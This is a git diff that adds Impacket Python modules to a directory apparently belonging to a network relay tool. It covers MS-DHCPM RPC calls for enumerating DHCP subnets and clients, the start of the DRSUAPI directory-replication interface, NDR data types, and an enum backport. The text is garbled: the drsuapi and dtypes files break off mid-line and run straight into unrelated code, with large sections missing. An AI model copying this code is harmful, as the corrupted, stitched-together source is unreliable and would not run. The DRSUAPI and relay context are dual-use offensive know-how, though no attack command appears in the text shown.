+ DhcpBinaryDataOption = 6 + DhcpEncapsulatedDataOption = 7 + DhcpIpv6AddressOption = 8 + +class DHCP_OPTION_ELEMENT_UNION(NDRUNION): + commonHdr = ( + ('tag', DHCP_OPTION_DATA_TYPE), + ) + union = { + DHCP_OPTION_DATA_TYPE.DhcpByteOption : ('ByteOption', BYTE), + DHCP_OPTION_DATA_TYPE.DhcpWordOption : ('WordOption', WORD), + DHCP_OPTION_DATA_TYPE.DhcpDWordOption : ('DWordOption', DWORD), + DHCP_OPTION_DATA_TYPE.DhcpDWordDWordOption : ('DWordDWordOption', DWORD_DWORD), + DHCP_OPTION_DATA_TYPE.DhcpIpAddressOption : ('IpAddressOption', DHCP_IP_ADDRESS), + DHCP_OPTION_DATA_TYPE.DhcpStringDataOption : ('StringDataOption', LPWSTR), + DHCP_OPTION_DATA_TYPE.DhcpBinaryDataOption : ('BinaryDataOption', DHCP_BINARY_DATA), + DHCP_OPTION_DATA_TYPE.DhcpEncapsulatedDataOption: ('EncapsulatedDataOption', DHCP_BINARY_DATA), + DHCP_OPTION_DATA_TYPE.DhcpIpv6AddressOption : ('Ipv6AddressDataOption', LPWSTR), + } + +class DHCP_OPTION_DATA_ELEMENT(NDRSTRUCT): + structure = ( + ('OptionType', DHCP_OPTION_DATA_TYPE), + ('Element', DHCP_OPTION_ELEMENT_UNION), + ) + +class DHCP_OPTION_DATA_ELEMENT_ARRAY2(NDRUniConformantArray): + item = DHCP_OPTION_DATA_ELEMENT + +class LPDHCP_OPTION_DATA_ELEMENT(NDRPOINTER): + referent = ( + ('Data', DHCP_OPTION_DATA_ELEMENT_ARRAY2), + ) + +class DHCP_OPTION_DATA(NDRSTRUCT): + structure = ( + ('NumElements', DWORD), + ('Elements', LPDHCP_OPTION_DATA_ELEMENT), + ) + +class DHCP_OPTION_VALUE(NDRSTRUCT): + structure = ( + ('OptionID', DHCP_OPTION_ID), + ('Value', DHCP_OPTION_DATA), + ) + +class PDHCP_OPTION_VALUE(NDRPOINTER): + referent = ( + ('Data', DHCP_OPTION_VALUE), + ) + +class DHCP_OPTION_VALUE_ARRAY2(NDRUniConformantArray): + item = DHCP_OPTION_VALUE + +class LPDHCP_OPTION_VALUE(NDRPOINTER): + referent = ( + ('Data', DHCP_OPTION_VALUE_ARRAY2), + ) + +class DHCP_OPTION_VALUE_ARRAY(NDRSTRUCT): + structure = ( + ('NumElements', DWORD), + ('Values', LPDHCP_OPTION_VALUE), + ) + +class LPDHCP_OPTION_VALUE_ARRAY(NDRPOINTER): + referent = ( + ('Data', DHCP_OPTION_VALUE_ARRAY), + ) + +class DHCP_ALL_OPTION_VALUES(NDRSTRUCT): + structure = ( + ('ClassName', LPWSTR), + ('VendorName', LPWSTR), + ('IsVendor', BOOL), + ('OptionsArray', LPDHCP_OPTION_VALUE_ARRAY), + ) + +class OPTION_VALUES_ARRAY(NDRUniConformantArray): + item = DHCP_ALL_OPTION_VALUES + +class LPOPTION_VALUES_ARRAY(NDRPOINTER): + referent = ( + ('Data', OPTION_VALUES_ARRAY), + ) + +class DHCP_ALL_OPTIONS_VALUES(NDRSTRUCT): + structure = ( + ('Flags', DWORD), + ('NumElements', DWORD), + ('Options', LPOPTION_VALUES_ARRAY), + ) + +class LPDHCP_ALL_OPTION_VALUES(NDRPOINTER): + referent = ( + ('Data', DHCP_ALL_OPTIONS_VALUES), + ) + +################################################################################ +# RPC CALLS +################################################################################ +# Interface dhcpsrv +class DhcpGetSubnetInfo(NDRCALL): + opnum = 2 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('SubnetAddress', DHCP_IP_ADDRESS), + ) + +class DhcpGetSubnetInfoResponse(NDRCALL): + structure = ( + ('SubnetInfo', LPDHCP_SUBNET_INFO), + ('ErrorCode', ULONG), + ) + +class DhcpEnumSubnets(NDRCALL): + opnum = 3 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('ResumeHandle', LPDWORD), + ('PreferredMaximum', DWORD), + ) + +class DhcpEnumSubnetsResponse(NDRCALL): + structure = ( + ('ResumeHandle', LPDWORD), + ('EnumInfo', DHCP_IP_ARRAY), + ('EnumRead', DWORD), + ('EnumTotal', DWORD), + ('ErrorCode', ULONG), + ) + +class DhcpGetOptionValue(NDRCALL): + opnum = 13 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('OptionID', DHCP_OPTION_ID), + ('ScopeInfo', DHCP_OPTION_SCOPE_INFO), + ) + +class DhcpGetOptionValueResponse(NDRCALL): + structure = ( + ('OptionValue', PDHCP_OPTION_VALUE), + ('ErrorCode', ULONG), + ) + +class DhcpEnumOptionValues(NDRCALL): + opnum = 14 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('ScopeInfo', DHCP_OPTION_SCOPE_INFO), + ('ResumeHandle', LPDWORD), + ('PreferredMaximum', DWORD), + ) + +class DhcpEnumOptionValuesResponse(NDRCALL): + structure = ( + ('ResumeHandle', DWORD), + ('OptionValues', LPDHCP_OPTION_VALUE_ARRAY), + ('OptionsRead', DWORD), + ('OptionsTotal', DWORD), + ('ErrorCode', ULONG), + ) + +class DhcpGetClientInfoV4(NDRCALL): + opnum = 34 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('SearchInfo', DHCP_SEARCH_INFO), + ) + +class DhcpGetClientInfoV4Response(NDRCALL): + structure = ( + ('ClientInfo', LPDHCP_CLIENT_INFO_V4), + ('ErrorCode', ULONG), + ) + +class DhcpEnumSubnetClientsV4(NDRCALL): + opnum = 35 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('SubnetAddress', DHCP_IP_ADDRESS), + ('ResumeHandle', DWORD), + ('PreferredMaximum', DWORD), + ) + +class DhcpEnumSubnetClientsV4Response(NDRCALL): + structure = ( + ('ResumeHandle', LPDWORD), + ('ClientInfo', LPDHCP_CLIENT_INFO_ARRAY_V4), + ('ClientsRead', DWORD), + ('ClientsTotal', DWORD), + ('ErrorCode', ULONG), + ) + +# Interface dhcpsrv2 + +class DhcpEnumSubnetClientsV5(NDRCALL): + opnum = 0 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('SubnetAddress', DHCP_IP_ADDRESS), + ('ResumeHandle', LPDWORD), + ('PreferredMaximum', DWORD), + ) + +class DhcpEnumSubnetClientsV5Response(NDRCALL): + structure = ( + ('ResumeHandle', DWORD), + ('ClientsInfo', LPDHCP_CLIENT_INFO_ARRAY_V5), + ('ClientsRead', DWORD), + ('ClientsTotal', DWORD), + ) + +class DhcpGetOptionValueV5(NDRCALL): + opnum = 21 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('Flags', DWORD), + ('OptionID', DHCP_OPTION_ID), + ('ClassName', LPWSTR), + ('VendorName', LPWSTR), + ('ScopeInfo', DHCP_OPTION_SCOPE_INFO), + ) + +class DhcpGetOptionValueV5Response(NDRCALL): + structure = ( + ('OptionValue', PDHCP_OPTION_VALUE), + ('ErrorCode', ULONG), + ) + +class DhcpEnumOptionValuesV5(NDRCALL): + opnum = 22 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('Flags', DWORD), + ('ClassName', LPWSTR), + ('VendorName', LPWSTR), + ('ScopeInfo', DHCP_OPTION_SCOPE_INFO), + ('ResumeHandle', LPDWORD), + ('PreferredMaximum', DWORD), + ) + +class DhcpEnumOptionValuesV5Response(NDRCALL): + structure = ( + ('ResumeHandle', DWORD), + ('OptionValues', LPDHCP_OPTION_VALUE_ARRAY), + ('OptionsRead', DWORD), + ('OptionsTotal', DWORD), + ('ErrorCode', ULONG), + ) + +class DhcpGetAllOptionValues(NDRCALL): + opnum = 30 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('Flags', DWORD), + ('ScopeInfo', DHCP_OPTION_SCOPE_INFO), + ) + +class DhcpGetAllOptionValuesResponse(NDRCALL): + structure = ( + ('Values', LPDHCP_ALL_OPTION_VALUES), + ('ErrorCode', ULONG), + ) + +class DhcpEnumSubnetElementsV5(NDRCALL): + opnum = 38 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('SubnetAddress', DHCP_IP_ADDRESS), + ('EnumElementType', DHCP_SUBNET_ELEMENT_TYPE), + ('ResumeHandle', LPDWORD), + ('PreferredMaximum', DWORD), + ) + +class DhcpEnumSubnetElementsV5Response(NDRCALL): + structure = ( + ('ResumeHandle', DWORD), + ('EnumElementInfo', LPDHCP_SUBNET_ELEMENT_INFO_ARRAY_V5), + ('ElementsRead', DWORD), + ('ElementsTotal', DWORD), + ('ErrorCode', ULONG), + ) + +class DhcpEnumSubnetClientsVQ(NDRCALL): + opnum = 47 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('SubnetAddress', DHCP_IP_ADDRESS), + ('ResumeHandle', LPDWORD), + ('PreferredMaximum', DWORD), + ) + +class DhcpEnumSubnetClientsVQResponse(NDRCALL): + structure = ( + ('ResumeHandle', LPDWORD), + ('ClientInfo', LPDHCP_CLIENT_INFO_ARRAY_VQ), + ('ClientsRead', DWORD), + ('ClientsTotal', DWORD), + ('ErrorCode', ULONG), + ) + +class DhcpV4GetClientInfo(NDRCALL): + opnum = 123 + structure = ( + ('ServerIpAddress', DHCP_SRV_HANDLE), + ('SearchInfo', DHCP_SEARCH_INFO), + ) + +class DhcpV4GetClientInfoResponse(NDRCALL): + structure = ( + ('ClientInfo', LPDHCP_CLIENT_INFO_PB), + ('ErrorCode', ULONG), + ) + +################################################################################ +# OPNUMs and their corresponding structures +################################################################################ +OPNUMS = { + 0: (DhcpEnumSubnetClientsV5, DhcpEnumSubnetClientsV5Response), + 2: (DhcpGetSubnetInfo, DhcpGetSubnetInfoResponse), + 3: (DhcpEnumSubnets, DhcpEnumSubnetsResponse), + 13: (DhcpGetOptionValue, DhcpGetOptionValueResponse), + 14: (DhcpEnumOptionValues, DhcpEnumOptionValuesResponse), + 21: (DhcpGetOptionValueV5, DhcpGetOptionValueV5Response), + 22: (DhcpEnumOptionValuesV5, DhcpEnumOptionValuesV5Response), + 30: (DhcpGetAllOptionValues, DhcpGetAllOptionValuesResponse), + 34: (DhcpGetClientInfoV4, DhcpGetClientInfoV4Response), + 35: (DhcpEnumSubnetClientsV4, DhcpEnumSubnetClientsV4Response), + 38: (DhcpEnumSubnetElementsV5, DhcpEnumSubnetElementsV5Response), + 47: (DhcpEnumSubnetClientsVQ, DhcpEnumSubnetClientsVQResponse), + 123: (DhcpV4GetClientInfo, DhcpV4GetClientInfoResponse), +} + + +################################################################################ +# HELPER FUNCTIONS +################################################################################ +def hDhcpGetClientInfoV4(dce, searchType, searchValue): + request = DhcpGetClientInfoV4() + + request['ServerIpAddress'] = NULL + request['SearchInfo']['SearchType'] = searchType + request['SearchInfo']['SearchInfo']['tag'] = searchType + if searchType == DHCP_SEARCH_INFO_TYPE.DhcpClientIpAddress: + request['SearchInfo']['SearchInfo']['ClientIpAddress'] = searchValue + elif searchType == DHCP_SEARCH_INFO_TYPE.DhcpClientHardwareAddress: + # This should be a DHCP_BINARY_DATA + request['SearchInfo']['SearchInfo']['ClientHardwareAddress'] = searchValue + else: + request['SearchInfo']['SearchInfo']['ClientName'] = searchValue + + return dce.request(request) + +def hDhcpGetSubnetInfo(dce, subnetaddress): + request = DhcpGetSubnetInfo() + + request['ServerIpAddress'] = NULL + request['SubnetAddress'] = subnetaddress + resp = dce.request(request) + + return resp + +def hDhcpGetOptionValue(dce, optionID, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL): + request = DhcpGetOptionValue() + + request['ServerIpAddress'] = NULL + request['OptionID'] = optionID + request['ScopeInfo']['ScopeType'] = scopetype + if scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions and scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions: + request['ScopeInfo']['ScopeInfo']['tag'] = scopetype + if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions: + request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions: + request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions: + request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options + + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('ERROR_NO_MORE_ITEMS') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpEnumOptionValues(dce, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL, + preferredMaximum=0xffffffff): + request = DhcpEnumOptionValues() + + request['ServerIpAddress'] = NULL + request['ScopeInfo']['ScopeType'] = scopetype + if scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions and scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions: + request['ScopeInfo']['ScopeInfo']['tag'] = scopetype + if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions: + request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions: + request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions: + request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options + request['ResumeHandle'] = NULL + request['PreferredMaximum'] = preferredMaximum + + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('ERROR_NO_MORE_ITEMS') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpEnumOptionValuesV5(dce, flags=DHCP_FLAGS_OPTION_DEFAULT, classname=NULL, vendorname=NULL, + scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL, + preferredMaximum=0xffffffff): + request = DhcpEnumOptionValuesV5() + + request['ServerIpAddress'] = NULL + request['Flags'] = flags + request['ClassName'] = classname + request['VendorName'] = vendorname + request['ScopeInfo']['ScopeType'] = scopetype + request['ScopeInfo']['ScopeInfo']['tag'] = scopetype + if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions: + request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions: + request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions: + request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options + request['ResumeHandle'] = NULL + request['PreferredMaximum'] = preferredMaximum + + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('ERROR_NO_MORE_ITEMS') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpGetOptionValueV5(dce, option_id, flags=DHCP_FLAGS_OPTION_DEFAULT, classname=NULL, vendorname=NULL, + scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL): + request = DhcpGetOptionValueV5() + + request['ServerIpAddress'] = NULL + request['Flags'] = flags + request['OptionID'] = option_id + request['ClassName'] = classname + request['VendorName'] = vendorname + request['ScopeInfo']['ScopeType'] = scopetype + request['ScopeInfo']['ScopeInfo']['tag'] = scopetype + if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions: + request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions: + request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions: + request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options + + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('ERROR_NO_MORE_ITEMS') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpGetAllOptionValues(dce, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL): + request = DhcpGetAllOptionValues() + + request['ServerIpAddress'] = NULL + request['Flags'] = NULL + request['ScopeInfo']['ScopeType'] = scopetype + request['ScopeInfo']['ScopeInfo']['tag'] = scopetype + if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions: + request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions: + request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options + elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions: + request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options + + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('ERROR_NO_MORE_ITEMS') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpEnumSubnets(dce, preferredMaximum=0xffffffff): + request = DhcpEnumSubnets() + + request['ServerIpAddress'] = NULL + request['ResumeHandle'] = NULL + request['PreferredMaximum'] = preferredMaximum + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('STATUS_MORE_ENTRIES') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpEnumSubnetClientsVQ(dce, preferredMaximum=0xffffffff): + request = DhcpEnumSubnetClientsVQ() + + request['ServerIpAddress'] = NULL + request['SubnetAddress'] = NULL + request['ResumeHandle'] = NULL + request['PreferredMaximum'] = preferredMaximum + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('STATUS_MORE_ENTRIES') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpEnumSubnetClientsV4(dce, preferredMaximum=0xffffffff): + request = DhcpEnumSubnetClientsV4() + + request['ServerIpAddress'] = NULL + request['SubnetAddress'] = NULL + request['ResumeHandle'] = NULL + request['PreferredMaximum'] = preferredMaximum + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('STATUS_MORE_ENTRIES') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpEnumSubnetClientsV5(dce, subnetAddress=0, preferredMaximum=0xffffffff): + request = DhcpEnumSubnetClientsV5() + + request['ServerIpAddress'] = NULL + request['SubnetAddress'] = subnetAddress + request['ResumeHandle'] = NULL + request['PreferredMaximum'] = preferredMaximum + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCSessionError as e: + if str(e).find('STATUS_MORE_ENTRIES') < 0: + raise + resp = e.get_packet() + return resp + +def hDhcpEnumSubnetElementsV5(dce, subnet_address, element_type=DHCP_SUBNET_ELEMENT_TYPE.DhcpIpRanges, preferredMaximum=0xffffffff): + request = DhcpEnumSubnetElementsV5() + + request['ServerIpAddress'] = NULL + request['SubnetAddress'] = subnet_address + request['EnumElementType'] = element_type + request['ResumeHandle'] = NULL + request['PreferredMaximum'] = preferredMaximum + + status = system_errors.ERROR_MORE_DATA + while status == system_errors.ERROR_MORE_DATA: + try: + resp = dce.request(request) + except DCERPCException as e: + if str(e).find('ERROR_NO_MORE_ITEMS') < 0: + raise + resp = e.get_packet() + return resp diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/drsuapi.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/drsuapi.py new file mode 100644 index 0000000..1671aa4 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/drsuapi.py @@ -0,0 +1,1517 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-DRSR] Directory Replication Service (DRS) DRSUAPI Interface implementation +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Some calls have helper functions, which makes it even easier to use. +# They are located at the end of this file. +# Helper functions start with "h". +# There are test cases for them too. +# +from __future__ import division +from __future__ import print_function +from builtins import bytes +import hashlib +from struct import pack +import six +from six import PY2 + +from impacket import LOG +from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUNION, NDR, NDRENUM +from impacket.dcerpc.v5.dtypes import PUUID, DWORD, NULL, GUID, LPWSTR, BOOL, ULONG, UUID, LONGLONG, ULARGE_INTEGER, LARGE_INTEGER +from impacket import hresult_errors, system_errors +from impacket.structure import Structure +from impacket.uuid import uuidtup_to_bin, string_to_bin +from impacket.dcerpc.v5.enum import Enum +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket.krb5 import crypto +from pyasn1.type import univ +from pyasn1.codec.ber import decoder +from impacket.crypto import transformKey + +try: + from Cryptodome.Cipher import ARC4, DES +except Exception: + LOG.critical("Warning: You don't have any crypto installed. You need pycryptodomex") + LOG.critical("See https://pypi.org/project/pycryptodomex/") + +MSRPC_UUID_DRSUAPI = uuidtup_to_bin(('E3514235-4B06-11D1-AB04-00C04FC2DCD2','4.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in hresult_errors.ERROR_MESSAGES: + error_msg_short = hresult_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1] + return 'DRSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + elif key & 0xffff in system_errors.ERROR_MESSAGES: + error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0] + error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1] + return 'DRSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'DRSR SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +# 4.1.10.2.17 EXOP_ERR Codes +class EXOP_ERR(NDRENUM): + align = 4 + align64 = 4 + structure = ( + ('Data', '= 16384: + # mark it so that it is known to not be the whole lastValue + lowerWord += 32768 + + upperWord = pos + + attrTyp = ATTRTYP() + attrTyp['Data'] = (upperWord << 16) + lowerWord + return attrTyp + +def OidFromAttid(prefixTable, attr): + # separate the ATTRTYP into two parts + upperWord = attr // 65536 + lowerWord = attr % 65536 + + # search in the prefix table to find the upperWord, if found, + # construct the binary OID by appending lowerWord to the end of + # found prefix. + + binaryOID = None + for j, item in enumerate(prefixTable): + if item['ndx'] == upperWord: + binaryOID = item['prefix']['elements'][:item['prefix']['length']] + if lowerWord < 128: + binaryOID.append(pack('B',lowerWord)) + else: + if lowerWord >= 32768: + lowerWord -= 32768 + binaryOID.append(pack('B',(((lowerWord//128) % 128)+128))) + binaryOID.append(pack('B',(lowerWord%128))) + break + + if binaryOID is None: + return None + return str(decoder.decode(b'\x06' + pack('B',(len(binaryOID))) + b''.join(binaryOID), asn1Spec = univ.ObjectIdentifier())[0]) + +if __name__ == '__main__': + prefixTable = [] + oid0 = '1.2.840.113556.1.4.94' + oid1 = '2.5.6.2' + oid2 = '1.2.840.113556.1.2.1' + oid3 = '1.2.840.113556.1.3.223' + oid4 = '1.2.840.113556.1.5.7000.53' + + o0 = MakeAttid(prefixTable, oid0) + print(hex(o0)) + o1 = MakeAttid(prefixTable, oid1) + print(hex(o1)) + o2 = MakeAttid(prefixTable, oid2) + print(hex(o2)) + o3 = MakeAttid(prefixTable, oid3) + print(hex(o3)) + o4 = MakeAttid(prefixTable, oid4) + print(hex(o4)) + jj = OidFromAttid(prefixTable, o0) + print(jj) + jj = OidFromAttid(prefixTable, o1) + print(jj) + jj = OidFromAttid(prefixTable, o2) + print(jj) + jj = OidFromAttid(prefixTable, o3) + print(jj) + jj = OidFromAttid(prefixTable, o4) + print(jj) diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py new file mode 100644 index 0000000..903a9ae --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py @@ -0,0 +1,542 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-DTYP] Interface mini implementation +# +from __future__ import division +from __future__ import print_function +from struct import pack +from six import binary_type + +from impacket.dcerpc.v5.ndr import NDRULONG, NDRUHYPER, NDRSHORT, NDRLONG, NDRPOINTER, NDRUniConformantArray, \ + NDRUniFixedArray, NDR, NDRHYPER, NDRSMALL, NDRPOINTERNULL, NDRSTRUCT, \ + NDRUSMALL, NDRBOOLEAN, NDRUSHORT, NDRFLOAT, NDRDOUBLEFLOAT, NULL + +DWORD = NDRULONG +BOOL = NDRULONG +UCHAR = NDRUSMALL +SHORT = NDRSHORT +NULL = NULL + +class LPDWORD(NDRPOINTER): + referent = ( + ('Data', DWORD), + ) + +class PSHORT(NDRPOINTER): + referent = ( + ('Data', SHORT), + ) + +class PBOOL(NDRPOINTER): + referent = ( + ('Data', BOOL), + ) + +class LPBYTE(NDRPOINTER): + referent = ( + ('Data', NDRUniConformantArray), + ) +PBYTE = LPBYTE + +# 2.2.4 BOOLEAN +BOOLEAN = NDRBOOLEAN + +# 2.2.6 BYTE +BYTE = NDRUSMALL + +# 2.2.7 CHAR +CHAR = NDRSMALL +class PCHAR(NDRPOINTER): + referent = ( + ('Data', CHAR), + ) + +class WIDESTR(NDRUniFixedArray): + def getDataLen(self, data, offset=0): + return data.find(b'\x00\x00\x00', offset)+3-offset + + def __setitem__(self, key, value): + if key == 'Data': + try: + self.fields[key] = value.encode('utf-16le') + except UnicodeDecodeError: + import sys + self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le') + + self.data = None # force recompute + else: + return NDR.__setitem__(self, key, value) + + def __getitem__(self, key): + if key == 'Data': + return self.fields[key].decode('utf-16le') + else: + return NDR.__getitem__(self,key) + +class STR(NDRSTRUCT): + commonHdr = ( + ('MaximumCount', ' 4) + + +def _is_sunder(name): + """Returns True if a _sunder_ name, False otherwise.""" + return (name[0] == name[-1] == '_' and + name[1:2] != '_' and + name[-2:-1] != '_' and + len(name) > 2) + + +def _make_class_unpicklable(cls): + """Make the given class un-picklable.""" + def _break_on_call_reduce(self): + raise TypeError('%r cannot be pickled' % self) + cls.__reduce__ = _break_on_call_reduce + cls.__module__ = '' + + +class _EnumDict(dict): + """Track enum member order and ensure member names are not reused. + + EnumMeta will use the names found in self._member_names as the + enumeration member names. + + """ + def __init__(self): + super(_EnumDict, self).__init__() + self._member_names = [] + + def __setitem__(self, key, value): + """Changes anything not dundered or not a descriptor. + + If a descriptor is added with the same name as an enum member, the name + is removed from _member_names (this may leave a hole in the numerical + sequence of values). + + If an enum member name is used twice, an error is raised; duplicate + values are not checked for. + + Single underscore (sunder) names are reserved. + + Note: in 3.x __order__ is simply discarded as a not necessary piece + leftover from 2.x + + """ + if pyver >= 3.0 and key == '__order__': + return + if _is_sunder(key): + raise ValueError('_names_ are reserved for future Enum use') + elif _is_dunder(key): + pass + elif key in self._member_names: + # descriptor overwriting an enum? + raise TypeError('Attempted to reuse key: %r' % key) + elif not _is_descriptor(value): + if key in self: + # enum overwriting a descriptor? + raise TypeError('Key already defined as: %r' % self[key]) + self._member_names.append(key) + super(_EnumDict, self).__setitem__(key, value) + + +# Dummy value for Enum as EnumMeta explicitly checks for it, but of course until +# EnumMeta finishes running the first time the Enum class doesn't exist. This +# is also why there are checks in EnumMeta like `if Enum is not None` +Enum = None + + +class EnumMeta(type): + """Metaclass for Enum""" + @classmethod + def __prepare__(metacls, cls, bases): + return _EnumDict() + + def __new__(metacls, cls, bases, classdict): + # an Enum class is final once enumeration items have been defined; it + # cannot be mixed with other types (int, float, etc.) if it has an + # inherited __new__ unless a new __new__ is defined (or the resulting + # class will fail). + if type(classdict) is dict: + original_dict = classdict + classdict = _EnumDict() + for k, v in original_dict.items(): + classdict[k] = v + + member_type, first_enum = metacls._get_mixins_(bases) + #if member_type is object: + # use_args = False + #else: + # use_args = True + __new__, save_new, use_args = metacls._find_new_(classdict, member_type, + first_enum) + # save enum items into separate mapping so they don't get baked into + # the new class + members = dict((k, classdict[k]) for k in classdict._member_names) + for name in classdict._member_names: + del classdict[name] + + # py2 support for definition order + __order__ = classdict.get('__order__') + if __order__ is None: + __order__ = classdict._member_names + if pyver < 3.0: + order_specified = False + else: + order_specified = True + else: + del classdict['__order__'] + order_specified = True + if pyver < 3.0: + __order__ = __order__.replace(',', ' ').split() + aliases = [name for name in members if name not in __order__] + __order__ += aliases + + # check for illegal enum names (any others?) + invalid_names = set(members) & set(['mro']) + if invalid_names: + raise ValueError('Invalid enum member name(s): %s' % ( + ', '.join(invalid_names), )) + + # create our new Enum type + enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict) + enum_class._member_names_ 